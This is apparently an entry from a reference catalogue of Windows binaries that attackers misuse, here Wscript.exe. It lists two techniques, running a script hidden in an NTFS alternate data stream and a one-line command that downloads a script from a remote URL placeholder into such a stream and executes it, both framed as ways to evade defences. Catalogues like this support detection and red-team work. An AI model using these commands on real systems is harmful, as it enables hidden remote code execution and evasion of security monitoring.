Wscript.exe

Used by Windows to execute scripts

Paths

Execute script stored in an alternate data stream

Use case: Execute hidden code to evade defensive counter measures

Privileges: User

wscript //e:vbscript {PATH}:script.vbs

Download and execute script stored in an alternate data stream

Use case: Execute hidden code to evade defensive counter measures

Privileges: User

echo GetObject("script:{REMOTEURL:.js}") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js